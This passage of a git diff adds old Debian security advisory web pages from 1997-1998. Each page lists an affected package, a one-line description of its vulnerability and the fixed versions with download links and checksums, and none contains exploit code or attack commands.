HTML 3.2//EN"> +<HTML> +<HEAD> +<TITLE>Debian GNU/Linux - Security Information</TITLE> +<META HTTP-EQUIV="Content-Type" CONTENT="text/html; CHARSET=iso-8859-1"> +<META HTTP-EQUIV="Pragma" CONTENT="no-cache"> +</HEAD> + +<BODY BGCOLOR="#FFFFFF"> +<H1><IMG SRC="../Pics/debian.jpg" WIDTH=114 HEIGHT=140 ALIGN="middle" ALT="Debian GNU/Linux - ">Security Information</H1> +<HR> + +<P> Please send security-related bug reports to <a href="mailto:security@debian.org">security@debian.org</a><P> + +<DL> +<DT>Date reported: + <DD>17 Mar 1998 +<DT>Affected packages: + <DD>netstd +<DT>Brief description: + <DD>routed permits remote user file overwrite +<DT>Vulnerable: + <DD><FONT COLOR="#FF0000">Yes</FONT> +<DT>Fixed in: + <DD>3.02-1 (hamm) and soon in bo +<DT>Entered Distribution: + <DD> +</DL> + +<P><SMALL>Last Modified: 27 Mar 1998 +Copyright ©1998 SPI; See +<A HREF="../license.html">license terms.</A></SMALL> +<HR> +</BODY> +</HTML> diff --git a/english/security/nlspath.html b/english/security/nlspath.html new file mode 100644 index 00000000000..a3334d4d00c --- /dev/null +++ b/english/security/nlspath.html @@ -0,0 +1,32 @@ + +<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN"> +<HTML> +<HEAD> +<TITLE>Debian GNU/Linux - Security Information</TITLE> +<META HTTP-EQUIV="Content-Type" CONTENT="text/html; CHARSET=iso-8859-1"> +<META HTTP-EQUIV="Pragma" CONTENT="no-cache"> +</HEAD> + +<BODY BGCOLOR="#FFFFFF"> +<H1><IMG SRC="../Pics/debian.jpg" WIDTH=114 HEIGHT=140 ALIGN="middle" ALT="Debian GNU/Linux - ">Security Information</H1> +<HR> + +<P> Please send security-related bug reports to <a href="mailto:security@debian.org">security@debian.org</a><P> + +<DL> +<DT>Date reported: + <DD>February 13, 1997 +<DT>Brief description: + <DD>NLSPATH buffer overflow +<DT>Vulnerable: + <DD>Debian 1.2 and up are not vulnerable. +<DT>For more information: + <DD> <a href="info/nlspath.html">BugTraq</a> +</DL> + +<P><SMALL>Last Modified: 10 Jan 1998. +Copyright ©1997 SPI; See +<A HREF="../license.html">license terms.</A></SMALL> +<HR> +</BODY> +</HTML> diff --git a/english/security/parsecontrol.html b/english/security/parsecontrol.html new file mode 100644 index 00000000000..1d08b750747 --- /dev/null +++ b/english/security/parsecontrol.html @@ -0,0 +1,30 @@ + +<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN"> +<HTML> +<HEAD> +<TITLE>Debian GNU/Linux - Security Information</TITLE> +<META HTTP-EQUIV="Content-Type" CONTENT="text/html; CHARSET=iso-8859-1"> +<META HTTP-EQUIV="Pragma" CONTENT="no-cache"> +</HEAD> + +<BODY BGCOLOR="#FFFFFF"> +<H1><IMG SRC="../Pics/debian.jpg" WIDTH=114 HEIGHT=140 ALIGN="middle" ALT="Debian GNU/Linux - ">Security Information</H1> +<HR> + +<P> Please send security-related bug reports to <a href="mailto:security@debian.org">security@debian.org</a><P> + +<DL> +<DT>Affected packages: + <DD>inn +<DT>Brief description: + <DD>INN 1.5 parsecontrol +<DT>Vulnerable: + <DD>Debian is not vulnerable +</DL> + +<P><SMALL>Last Modified: 10 Jan 1998. +Copyright ©1997 SPI; See +<A HREF="../license.html">license terms.</A></SMALL> +<HR> +</BODY> +</HTML> diff --git a/english/security/perl.html b/english/security/perl.html new file mode 100644 index 00000000000..2a219e409af --- /dev/null +++ b/english/security/perl.html @@ -0,0 +1,35 @@ +<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN"> +<HTML> +<HEAD> +<TITLE>Debian GNU/Linux - Security Information</TITLE> +<META HTTP-EQUIV="Content-Type" CONTENT="text/html; CHARSET=iso-8859-1"> +<META HTTP-EQUIV="Pragma" CONTENT="no-cache"> +</HEAD> + +<BODY BGCOLOR="#FFFFFF"> +<H1><IMG SRC="../Pics/debian.jpg" WIDTH=114 HEIGHT=140 ALIGN="middle" ALT="Debian GNU/Linux - ">Security Information</H1> +<HR> + +<P> Please send security-related bug reports to <a href="mailto:security@debian.org">security@debian.org</a><P> + +<DL> +<DT>Date reported: + <DD>17 Mar 1998 +<DT>Affected packages: + <DD>perl prior to 5.004 (Debian fixed after 5.003.07-11) +<DT>Brief description: + <DD>vulnerable to symlink attack +<DT>Vulnerable: + <DD><FONT COLOR="#FF0000">Yes</FONT> +<DT>Fixed in: + <DD>5.004.04-5 (hamm) and soon in bo +<DT>Entered Distribution: + <DD> +</DL> + +<P><SMALL>Last Modified: 30 May 1998 +Copyright ©1998 SPI; See +<A HREF="../license.html">license terms.</A></SMALL> +<HR> +</BODY> +</HTML> diff --git a/english/security/php.html b/english/security/php.html new file mode 100644 index 00000000000..b8f2bd03206 --- /dev/null +++ b/english/security/php.html @@ -0,0 +1,38 @@ +<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN"> +<HTML> +<HEAD> +<TITLE>Debian GNU/Linux - Security Information</TITLE> +<META HTTP-EQUIV="Content-Type" CONTENT="text/html; CHARSET=iso-8859-1"> +<META HTTP-EQUIV="Pragma" CONTENT="no-cache"> +</HEAD> + +<BODY BGCOLOR="#FFFFFF"> +<H1><IMG SRC="../Pics/debian.jpg" WIDTH=114 HEIGHT=140 ALIGN="middle" ALT="Debian GNU/Linux - ">Security Information</H1> +<HR> + +<P> Please send security-related bug reports to <a href="mailto:security@debian.org">security@debian.org</a><P> + +<DL> +<DT>Date reported: + <DD>April 16, 1997 +<DT>Affected packages: + <DD>php +<DT>Brief description: + <DD>There is a vulnerability in PHP/FI, a NCSA httpd cgi enhancment +<DT>Vulnerable: + <DD><FONT COLOR="#FF0000">Yes</FONT> +<DT>Fixed in: + <DD>php 2.0b10-4 +<DT>Status in distribution: + <DD>Debian 1.2 did not have php at the time this was reported. All future + releases will have the fixed version. +<DT>For more information: + <DD><A HREF="info/php.html">BugTraq</A> +</DL> + +<P><SMALL>Last Modified: 10 Jan 1998. +Copyright ©1997 SPI; See +<A HREF="../license.html">license terms.</A></SMALL> +<HR> +</BODY> +</HTML> diff --git a/english/security/premail.html b/english/security/premail.html new file mode 100644 index 00000000000..7177cb80a3f --- /dev/null +++ b/english/security/premail.html @@ -0,0 +1,55 @@ +<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN"> +<HTML> +<HEAD> +<TITLE>Debian GNU/Linux - Security Information</TITLE> +<META HTTP-EQUIV="Content-Type" CONTENT="text/html; CHARSET=iso-8859-1"> +<META HTTP-EQUIV="Pragma" CONTENT="no-cache"> +</HEAD> + +<BODY BGCOLOR="#FFFFFF"> +<H1><IMG SRC="../Pics/debian.jpg" WIDTH=114 HEIGHT=140 ALIGN="middle" ALT="Debian GNU/Linux - ">Security Information</H1> +<HR> + +<P> Please send security-related bug reports to <a href="mailto:security@debian.org">security@debian.org</a><P> + +<DL> +<DT>Date reported: 30 May 1998 +<P> +<DT>Affected packages: premail prior to 0.45-4 +<P> +<DT>Brief description: + <DD>premail uses insecure method to open /tmp files +<P> +<DT>Vulnerable: <FONT COLOR="#FF0000">Yes</FONT> +<P> +<DT>Fixed in: Debian GNU/Linux 1.3.1 alias bo +<HR> + <DD>Source archives: + <DD><A HREF="ftp://ftp.de.debian.org/pub/debian-incoming/premail_0.45-4.diff.gz">premail_0.45-4.diff.gz</A> + (4237 bytes; MD5 checksum: 48e9f08119998c0b0aafe45fef0c9484) + <DD><A HREF="ftp://ftp.de.debian.org/debian-incoming/premail_0.45-4.dsc">premail_0.45-4.dsc</A> + (616 bytes; MD5 checksum: 34b0820c86fe5b58531ac6cb65613b01) + <DD><A HREF="ftp://ftp.debian.org/debian/non-free/source/premail_0.45.orig.tar.gz">premail_0.45.orig.tar.gz</A> + (80339 bytes; MD5 checksum: 1b48789ec4d191e5bf403d798c0bae34) +<P> + <DD>All architectures: + <DD><A HREF="ftp://ftp.de.debian.org/debian-incoming/premail_0.45-4_all.deb">premail_0.45-4_all.deb</A> + (85486 bytes; MD5 checksum: a5573cffe71dc728840ee1b31b4691b5) +<P> + <DD>Files from the incoming directory will be moved into: + <DD>ftp://ftp.debian.org/debian/bo-updates/binary-i386/ and + <DD>ftp://ftp.debian.org/debian/non-free/binary-i386/ or + <DD>ftp://ftp.debian.org/debian/contrib/binary-i386/ at a later time. +<P> + <DD>The package is the same for 1.3.1 and pre 2.0. +<P> +<DT>Entered Distribution: +</DL> + +<P><SMALL>Last Modified: 31 May 1998. +Copyright ©1997, 1998 SPI; See +<A HREF="../license.html">license terms.</A></SMALL> +<HR> +</BODY> +</HTML> + diff --git a/english/security/premail.html.sav b/english/security/premail.html.sav new file mode 100644 index 00000000000..09e34236ce4 --- /dev/null +++ b/english/security/premail.html.sav @@ -0,0 +1,55 @@ +!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN"> +<HTML> +<HEAD> +<TITLE>Debian GNU/Linux - Security Information</TITLE> +<META HTTP-EQUIV="Content-Type" CONTENT="text/html; CHARSET=iso-8859-1"> +<META HTTP-EQUIV="Pragma" CONTENT="no-cache"> +</HEAD> + +<BODY BGCOLOR="#FFFFFF"> +<H1><IMG SRC="../Pics/debian.jpg" WIDTH=114 HEIGHT=140 ALIGN="middle" ALT="Debian GNU/Linux - ">Security Information</H1> +<HR> + +<P> Please send security-related bug reports to <a href="mailto:security@debian.org">security@debian.org</a><P> + +<DL> +<DT>Date reported: 30 May 1998 +<P> +<DT>Affected packages: premail prior to 0.45-4 +<P> +<DT>Brief description: + <DD>premail uses insecure method to open /tmp files +<P> +<DT>Vulnerable: <FONT COLOR="#FF0000">Yes</FONT> +<P> +<DT>Fixed in: Debian GNU/Linux 1.3.1 alias bo +<HR> + <DD>Source archives: + <DD>ftp://ftp://ftp.de.debian.org/debian-incoming/Incoming/premail_0.45-4.diff.gz + <DD><SMALL>(MD5 checksum: 48e9f08119998c0b0aafe45fef0c9484)</SMALL> + <DD>ftp://ftp://ftp.de.debian.org/debian-incoming/Incoming/premail_0.45-4.dsc + <DD><SMALL>(MD5 checksum: 34b0820c86fe5b58531ac6cb65613b01)</SMALL> + <DD>ftp://ftp.debian.org/debian/non-free/source/premail_0.45.orig.tar.gz + <DD><SMALL>(MD5 checksum: 1b48789ec4d191e5bf403d798c0bae34)</SMALL><P> + + <DD>All architectures: + <DD>ftp://ftp://ftp.de.debian.org/debian-incoming/Incoming/premail_0.45-4_all.deb + <DD><SMALL>(MD5 checksum: a5573cffe71dc728840ee1b31b4691b5)</SMALL> +<P> + <DD>These files from the incoming directory will be moved into + <DD>ftp://ftp.debian.org/debian/bo-updates/binary-i386/ and + <DD>ftp://ftp.debian.org/debian/non-free/binary-i386/ or + <DD>ftp://ftp.debian.org/debian/contrib/binary-i386/ at a later time. +<P> + <DD>The package is the same for 1.3.1 and pre 2.0. +<P> +<DT>Entered Distribution: +</DL> + +<P><SMALL>Last Modified: 30 May 1998. +Copyright ©1997, 1998 SPI; See +<A HREF="../license.html">license terms.</A></SMALL> +<HR> +</BODY> +</HTML> + diff --git a/english/security/procps.html b/english/security/procps.html new file mode 100644 index 00000000000..bf39ff07367 --- /dev/null +++ b/english/security/procps.html @@ -0,0 +1,70 @@ +<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN"> +<HTML> +<HEAD> +<TITLE>Debian GNU/Linux - Security Information</TITLE> +<META HTTP-EQUIV="Content-Type" CONTENT="text/html; CHARSET=iso-8859-1"> +<META HTTP-EQUIV="Pragma" CONTENT="no-cache"> +</HEAD> + +<BODY BGCOLOR="#FFFFFF"> +<H1><IMG SRC="../Pics/debian.jpg" WIDTH=114 HEIGHT=140 ALIGN="middle" ALT="Debian GNU/Linux - ">Security Information</H1> +<HR> + +<P> Please send security-related bug reports to <a href="mailto:security@debian.org">security@debian.org</a><P> + +<DL> +<DT>Date reported: 09 May, 1998 +<P> +<DT>Affected packages: procps 1.2.6 +<P> +<DT>Brief description: + <DD>We have received a report about procps 1.2.6 containing a file +creation and corruption bug in XConsole. If you have procps installed +on your machines we suggest that you upgrade immetiately. The problem +is fixed in any 1.2.7 version of procps. +<P> +<DT>Vulnerable: <FONT COLOR="#FF0000">Yes</FONT> +<P> +<DT>Fixed in: Debian GNU/Linux 1.3.1 alias bo is not affected +<HR> +<P> +<DT>Fixed in: Debian GNU/Linux pre2.0 alias hamm + <DD> +<HR> + <DD>Source archives: + <DD>ftp://ftp.debian.org/debian/hamm/hamm/source/base/procps_1.2.7-1.diff.gz + <DD><SMALL>(MD5 checksum: bfca2826ad3460fbb085d16d5f5a0b63)</SMALL> + <DD>ftp://ftp.debian.org/debian/hamm/hamm/source/base/procps_1.2.7-1.dsc + <DD><SMALL>(MD5 checksum: 573c52c3d16f243af558fc81a5f98524)</SMALL> + <DD>ftp://ftp.debian.org/debian/hamm/hamm/source/base/procps_1.2.7.orig.tar.gz + <DD><SMALL>(MD5 checksum: 928f7833d71540dec5a5021d86921e2c)</SMALL> + +<P> Intel architecture: + <DD>ftp://ftp.debian.org/debian/hamm/hamm/binary-i386/utils/xproc_1.2.7-1.deb + <DD><SMALL>(MD5 checksum: a53744aa36af3a3e83f657fe60824171)</SMALL> + +<P> Motorola 68k architecture: + <DD>ftp://ftp.debian.org/debian/hamm/hamm/binary-m68k/utils/xproc_1.2.7-1.deb + <DD><SMALL>(MD5 checksum: a0f3382a45f626e2ab38b48bfa7b5649)</SMALL> + +<P> Sparc architecture + <DD>ftp://ftp.debian.org/debian/hamm/hamm/binary-sparc/utils/xproc_1.2.5-2.0.1.deb + <DD><SMALL>(MD5 checksum: 14da3722b4b50e0ff9727461fd0389a0)</SMALL> + +<P> Alpha architecture + <DD>ftp://ftp.debian.org/debian/hamm/hamm/binary-alpha/utils/xproc_1.2.7-1.deb + <DD><SMALL>(MD5 checksum: 8e152846756b9a49bf8d471337c5194e)</SMALL> + +<P> PowerPC architecture + <DD>ftp://ftp.debian.org/debian/ + <DD><SMALL>(MD5 checksum: )</SMALL> +<P> +<DT>Entered Distribution: +</DL> + +<P><SMALL>Last Modified: May 16, 1998. +Copyright ©1997 SPI; See +<A HREF="../license.html">license terms.</A></SMALL> +<HR> +</BODY> +</HTML> diff --git a/english/security/rlogin.html b/english/security/rlogin.html new file mode 100644 index 00000000000..d323bc951a9 --- /dev/null +++ b/english/security/rlogin.html @@ -0,0 +1,32 @@ + +<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN"> +<HTML> +<HEAD> +<TITLE>Debian GNU/Linux - Security Information</TITLE> +<META HTTP-EQUIV="Content-Type" CONTENT="text/html; CHARSET=iso-8859-1"> +<META HTTP-EQUIV="Pragma" CONTENT="no-cache"> +</HEAD> + +<BODY BGCOLOR="#FFFFFF"> +<H1><IMG SRC="../Pics/debian.jpg" WIDTH=114 HEIGHT=140 ALIGN="middle" ALT="Debian GNU/Linux - ">Security Information</H1> +<HR> + +<P> Please send security-related bug reports to <a href="mailto:security@debian.org">security@debian.org</a><P> + +<DL> +<DT>Date reported: + <DD>February 6, 1997 +<DT>Brief description: + <DD>rlogin doesn't check $TERM's length. +<DT>Vulnerable: + <DD> Fixed in Debian 1.2.7. +<DT>For more information: + <DD> <a href="info/rlogin.html">CERT</a> +</DL> + +<P><SMALL>Last Modified: 10 Jan 1998. +Copyright ©1997 SPI; See +<A HREF="../license.html">license terms.</A></SMALL> +<HR> +</BODY> +</HTML> diff --git a/english/security/samba.html b/english/security/samba.html new file mode 100644 index 00000000000..9cd7191392f --- /dev/null +++ b/english/security/samba.html @@ -0,0 +1,32 @@ + +<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN"> +<HTML> +<HEAD> +<TITLE>Debian GNU/Linux - Security Information</TITLE> +<META HTTP-EQUIV="Content-Type" CONTENT="text/html; CHARSET=iso-8859-1"> +<META HTTP-EQUIV="Pragma" CONTENT="no-cache"> +</HEAD> + +<BODY BGCOLOR="#FFFFFF"> +<H1><IMG SRC="../Pics/debian.jpg" WIDTH=114 HEIGHT=140 ALIGN="middle" ALT="Debian GNU/Linux - ">Security Information</H1> +<HR> + +<P> Please send security-related bug reports to <a href="mailto:security@debian.org">security@debian.org</a><P> + +<DL> +<DT>Affected packages: + <DD>samba +<DT>Brief description: + <DD>Problem with Samba allowed remote users to get root access +<DT>Vulnerable: + <DD><FONT COLOR="#FF0000">Yes</FONT> +<DT>Fixed in: + <DD>samba 1.9.17p2 or later +</DL> + +<P><SMALL>Last Modified: 10 Jan 1998. +Copyright ©1997 SPI; See +<A HREF="../license.html">license terms.</A></SMALL> +<HR> +</BODY> +</HTML> diff --git a/english/security/samba2.html b/english/security/samba2.html new file mode 100644 index 00000000000..675387a68cd --- /dev/null +++ b/english/security/samba2.html @@ -0,0 +1,92 @@ +!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN"> +<HTML> +<HEAD> +<TITLE>Debian GNU/Linux - Security Information</TITLE> +<META HTTP-EQUIV="Content-Type" CONTENT="text/html; CHARSET=iso-8859-1"> +<META HTTP-EQUIV="Pragma" CONTENT="no-cache"> +</HEAD> + +<BODY BGCOLOR="#FFFFFF"> +<H1><IMG SRC="../Pics/debian.jpg" WIDTH=114 HEIGHT=140 ALIGN="middle" ALT="Debian GNU/Linux - ">Security Information</H1> +<HR> + +<P> Please send security-related bug reports to <a href="mailto:security@debian.org">security@debian.org</a><P> + +<DL> +<DT>Date reported: 20 May 1998 +<P> +<DT>Affected packages: samba prior to 1.9.18p7 +<P> +<DT>Brief description: buffer overrun possibilities + <DD> +<P> +<DT>Vulnerable: <FONT COLOR="#FF0000">Yes</FONT> +<P> +<DT>Fixed in: Debian GNU/Linux 1.3.1 alias bo + <DD> +<HR> + <DD>Source archives: + <DD>ftp://ftp.debian.org/debian-incoming/Incoming/samba_1.9.18p7-3.diff.gz + <DD><SMALL>(MD5 checksum: 1e7a0fac16aa144deae38776bb1f6ae3)</SMALL> + <DD>ftp://ftp.debian.org/debian-incoming/Incoming/samba_1.9.18p7-3.dsc + <DD><SMALL>(MD5 checksum: 922b913a4526e397db451f51e7d84eb6)</SMALL> + <DD>ftp://ftp.debian.org/debian/hamm/hamm/source/net/samba_1.9.18p7.orig.tar.gz + <DD><SMALL>(MD5 checksum: 00d78fbb56e102e42277c7cab000a9bf)</SMALL><P> + + <DD>Intel architecture: + <DD>ftp://ftp.debian.org/debian-incoming/Incoming/samba_1.9.18p7-3_i386.deb + <DD><SMALL>(MD5 checksum: 67317909ead3b2c15a1590df4045b562)</SMALL> +<P> +The files from the incoming directory will be moved into ftp://ftp.debian.org/debian/bo-updates/binary-i386/ and ftp://ftp.debian.org/debian/bo/binary-i386/ at a later time. +<P> +<DT>Fixed in: Debian GNU/Linux pre2.0 alias hamm + <DD> +<HR> + <DD>Source archives: + <DD>ftp://ftp.debian.org/debian/hamm/hamm/source/net/samba_1.9.18p7-2.diff.gz + <DD><SMALL>(MD5 checksum: 5578966923eb2df932298c927b5eb962)</SMALL> + <DD>ftp://ftp.debian.org/debian/hamm/hamm/source/net/samba_1.9.18p7-2.dsc + <DD><SMALL>(MD5 checksum: e90837bba4f39b805f17d5a1940674e0)</SMALL> + <DD>ftp://ftp.debian.org/debian-incoming/Incoming/samba_1.9.18p7-4.diff.gz + <DD><SMALL>(MD5 checksum: cd99e53665e17571bad48da00540e624)</SMALL> + <DD>ftp://ftp.de.debian.org/debian-incoming/Incoming/samba_1.9.18p7-4.dsc + <DD><SMALL>(MD5 checksum: cd99e53665e17571bad48da00540e624)</SMALL> + <DD>ftp://ftp.de.debian.org/debian-incoming/Incoming/samba_1.9.18p7-4.dsc + <DD><SMALL>(MD5 checksum: 6d42175808d544d072a47dc5cedf2cc3)</SMALL> + <DD>ftp://ftp.debian.org/debian/hamm/hamm/source/net/samba_1.9.18p7.orig.tar.gz + <DD><SMALL>(MD5 checksum: 00d78fbb56e102e42277c7cab000a9bf)</SMALL> + +<P> Intel architecture: + <DD>ftp://ftp.debian.org/debian/hamm/hamm/binary-i386/net/samba_1.9.18p7-2.deb + <DD><SMALL>(MD5 checksum: 79af89751507342426884489637d1334)</SMALL> + + <DD>ftp://ftp.de.debian.org/debian-incoming/Incoming/samba_1.9.18p7-4_i386.deb + <DD><SMALL>(MD5 checksum: df8512a0ddbf1fdba64698ba67e52c94)</SMALL> + +<P> Motorola 68k architecture: + <DD>ftp://ftp.debian.org/debian/hamm/hamm/binary-m68k/net/samba_1.9.18p7-2.deb + <DD><SMALL>(MD5 checksum: 954dd6a1c45b1a54f0d5c65d577f1b7e)</SMALL> + + <DD>ftp://ftp.de.debian.org/debian-incoming/Incoming/samba_1.9.18p7-4_m68k.deb + <DD><SMALL>(MD5 checksum: 13a43fc85106cac2357ca1ac3d34cd62)</SMALL> + +<P> Alpha architecture + <DD>ftp://ftp.debian.org/debian/hamm/hamm/binary-alpha/net/samba_1.9.18p7-4.deb + <DD><SMALL>(MD5 checksum: 8b929a8cf2815d1da7091cf14295b1c2)</SMALL> + +<P> PowerPC architecture + <DD>This architecture is still in experimental stage. No fixed + <DD>samba package can be provided. Use at your own risk. +<P> + <DD>The files from the incoming directory will be moved into ftp://ftp.debian.org/debian/hamm/hamm/binary-$arch/ soon. +<P> +<DT>Entered Distribution: +</DL> + +<P><SMALL>Last Modified: May 30, 1998. +Copyright ©1997, 1998 SPI; See +<A HREF="../license.html">license terms.</A></SMALL> +<HR> +</BODY> +</HTML> + diff --git a/english/security/screen.html b/english/security/screen.html new file mode 100644 index 00000000000..63018f48403 --- /dev/null +++ b/english/security/screen.html @@ -0,0 +1,33 @@ +<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN"> +<HTML> +<HEAD> +<TITLE>Debian GNU/Linux - Security Information</TITLE> +<META HTTP-EQUIV="Content-Type" CONTENT="text/html; CHARSET=iso-8859-1"> +<META HTTP-EQUIV="Pragma" CONTENT="no-cache"> +</HEAD> + +<BODY BGCOLOR="#FFFFFF"> +<H1><IMG SRC="../Pics/debian.jpg" WIDTH=114 HEIGHT=140 ALIGN="middle" ALT="Debian GNU/Linux - ">Security Information</H1> +<HR> + +<P> Please send security-related bug reports to <a href="mailto:security@debian.org">security@debian.org</a><P> + +<DL> +<DT>Date reported: + <DD>February 20, 1997 +<DT>Affected package: + <DD>screen +<DT>Brief description: + <DD>The "screen" program overflows when copying the gcos field. +<DT>Vulnerable: + <DD>The overflow exists, but screen surrenders its root privileges before the faulty code is executed. +<DT>For more information: + <DD> <a href="info/screen.html">BugTraq</a> +</DL> + +<P><SMALL>Last Modified: 10 Jan 1998. +Copyright ©1997 SPI; See +<A HREF="../license.html">license terms.</A></SMALL> +<HR> +</BODY> +</HTML> diff --git a/english/security/sendmail.html b/english/security/sendmail.html new file mode 100644 index 00000000000..92b6dccaf1e --- /dev/null +++ b/english/security/sendmail.html @@ -0,0 +1,34 @@ + +<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN"> +<HTML> +<HEAD> +<TITLE>Debian GNU/Linux - Security Information</TITLE> +<META HTTP-EQUIV="Content-Type" CONTENT="text/html; CHARSET=iso-8859-1"> +<META HTTP-EQUIV="Pragma" CONTENT="no-cache"> +</HEAD> + +<BODY BGCOLOR="#FFFFFF"> +<H1><IMG SRC="../Pics/debian.jpg" WIDTH=114 HEIGHT=140 ALIGN="middle" ALT="Debian GNU/Linux - ">Security Information</H1> +<HR> + +<P> Please send security-related bug reports to <a href="mailto:security@debian.org">security@debian.org</a><P> + +<DL> +<DT>Date reported: + <DD>March 25, 1997 +<DT>Affected packages: + <DD>sendmail +<DT>Brief description: + <DD>sendmail 8.8.5 follows hardlinks when writing /var/tmp/dead.letter +<DT>Vulnerable: + <DD><FONT COLOR="#FF0000">Yes</FONT>, but sendmail is not installed by default +<DT>For more information: + <DD><A HREF="info/sendmail-dead-letter.html">BugTraq</A> +</DL> + +<P><SMALL>Last Modified: 10 Jan 1998. +Copyright ©1997 SPI; See +<A HREF="../license.html">license terms.</A></SMALL> +<HR> +</BODY> +</HTML> diff --git a/english/security/shadow-su.html b/english/security/shadow-su.html new file mode 100644 index 00000000000..14ccbf5fc55 --- /dev/null +++ b/english/security/shadow-su.html @@ -0,0 +1,82 @@ +<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN"> +<HTML> +<HEAD> +<TITLE>Debian GNU/Linux - Security Information</TITLE> +<META HTTP-EQUIV="Content-Type" CONTENT="text/html; CHARSET=iso-8859-1"> +<META HTTP-EQUIV="Pragma" CONTENT="no-cache"> +</HEAD> + +<BODY BGCOLOR="#FFFFFF"> +<H1><IMG SRC="../Pics/debian.jpg" WIDTH=114 HEIGHT=140 ALIGN="middle" ALT="Debian GNU/Linux - ">Security Information</H1> +<HR> + +<P> Please send security-related bug reports to <a href="mailto:security@debian.org">security@debian.org</a><P> + +<DL> +<DT>Date reported: 13 May, 1998 +<P> +<DT>Affected packages: shadow-su +<P> +<DT>Brief description: + <DD>We have received reports telling us that there was a problem with the +program su from the shadow package. This has been fixed in recent +uploads. We recommend you update shadow-su immediately if you have +it installed on your system. +<P> +<DT>Vulnerable: <FONT COLOR="#FF0000">Yes</FONT> +<P> +<DT>Fixed in: Debian GNU/Linux 1.3.1 alias bo + <DD> +<HR> + <DD>Source archives: + <DD>ftp://ftp.debian.org/debian/bo-updates/shadow_961025-2.1.changes + <DD><SMALL>(MD5 checksum: 86482854517aacc1b70b86195de2fbe0)</SMALL> + <DD>ftp://ftp.debian.org/debian/bo-updates/shadow_961025-2.1.diff.gz + <DD><SMALL>(MD5 checksum: b50d5ad4a812670b01734a1dac0d8271)</SMALL> + <DD>ftp://ftp.debian.org/debian/bo-updates/shadow_961025-2.1.dsc + <DD><SMALL>(MD5 checksum: f935d9684286313377693815322d2a20)</SMALL> +<P> + <DD>Intel architecture: + <DD>ftp://ftp.debian.org/debian/bo-updates/secure-su_961025-2.1_i386.deb + <DD><SMALL>(MD5 checksum: 8c698c31a76a5300b7d26c39539e4c27)</SMALL> +<P> +These files will be moved to ftp://ftp.debian.org/debian/bo/source/ and ftp://ftp.debian.org/debian/bo/binary-i386/ at a later date. +<P> +<DT>Fixed in: Debian GNU/Linux pre2.0 alias hamm +<HR> + <DD>Source archives: + <DD>ftp://ftp.debian.org/debian/hamm/hamm/source/base/shadow_980403-0.1.diff.gz + <DD><SMALL>(MD5 checksum: c6527c97f94787bbeb4c6ff9328410c0)</SMALL> + <DD>ftp://ftp.debian.org/debian/hamm/hamm/source/base/shadow_980403-0.1.dsc + <DD><SMALL>(MD5 checksum: 9069dd464038145717884d446598c30a)</SMALL> + <DD>ftp://ftp.debian.org/debian/hamm/hamm/source/base/shadow_980403.orig.tar.gz + <DD><SMALL>(MD5 checksum: d90bcba210c35db518c4e8c2a447dc13)</SMALL> + +<P> Intel architecture: + <DD>ftp://ftp.debian.org/debian/hamm/hamm/binary-i386/admin/secure-su_980403-0.1.deb + <DD><SMALL>(MD5 checksum: 253a9c7a146ee0dbf3f187b039307427)</SMALL> + <DD>ftp://ftp.debian.org/debian/hamm/hamm/binary-i386/admin/secure-su_970616-1.1_i386.deb + <DD><SMALL>(MD5 checksum: 253a9c7a146ee0dbf3f187b039307427)</SMALL> + +<P> Motorola 68k architecture: + <DD>ftp://ftp.debian.org/debian//hamm/hamm/binary-m68k/admin/secure-su_980403-0.1.deb + <DD><SMALL>(MD5 checksum: 7b5822abfce767a31cfa30f022edda6e)</SMALL> + +<P> Sparc architecture + <DD> This architecture is not fully operational yet. No fixed secure-su package can be provided. Use at your own risk. +<P> Alpha architecture + <DD>ftp://ftp.debian.org/debian/hamm/hamm/binary-alpha/admin/secure-su_980403-0.1.deb + <DD><SMALL>(MD5 checksum: f4f07098adbd0f3c3b53e9a2f5f828a7)</SMALL> + +<P> PowerPC architecture + <DD>This architecture is still in experimental stage. No fixed secure-su package can be provided. Use at your own risk. +<P> +<DT>Entered Distribution: +</DL> + +<P><SMALL>Last Modified: May 16, 1998. +Copyright ©1997 SPI; See +<A HREF="../license.html">license terms.</A></SMALL> +<HR> +</BODY> +</HTML> diff --git a/english/security/smail.html b/english/security/smail.html new file mode 100644 index 00000000000..0678dc89d6c --- /dev/null +++ b/english/security/smail.html @@ -0,0 +1,39 @@ +<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN"> +<HTML> +<HEAD> +<TITLE>Debian GNU/Linux - Security Information</TITLE> +<META HTTP-EQUIV="Content-Type" CONTENT="text/html; CHARSET=iso-8859-1"> +<META HTTP-EQUIV="Pragma" CONTENT="no-cache"> +</HEAD> + +<BODY BGCOLOR="#FFFFFF"> +<H1><IMG SRC="../Pics/debian.jpg" WIDTH=114 HEIGHT=140 ALIGN="middle" ALT="Debian GNU/Linux - ">Security Information</H1> +<HR> + +<P> Please send security-related bug reports to <a href="mailto:security@debian.org">security@debian.org</a><P> + +<DL> +<DT>Date reported: + <DD>12 Jan 1998 +<DT>Affected packages: + <DD>smail +<DT>Brief description: + <DD>UUCP exploit under smail +<DT>Vulnerable: + <DD><FONT COLOR="#FF0000">Yes</FONT> +<DT>Fixed in: + <DD>smail 3.2.0.92-3 available in bo-updates or 3.2.0.100-4 in hamm +<DT>Entered Distribution: + <DD>14 Jan 1998 +<!-- +<DT>For more information: + <DD> +--> +</DL> + +<P><SMALL>Last Modified: 15 Jan 1998. +Copyright ©1997 SPI; See +<A HREF="../license.html">license terms.</A></SMALL> +<HR> +</BODY> +</HTML> diff --git a/english/security/sperl.html b/english/security/sperl.html new file mode 100644 index 00000000000..cdc9faaa066 --- /dev/null +++ b/english/security/sperl.html @@ -0,0 +1,34 @@ + +<!DOCTYPE HTML PUBLIC 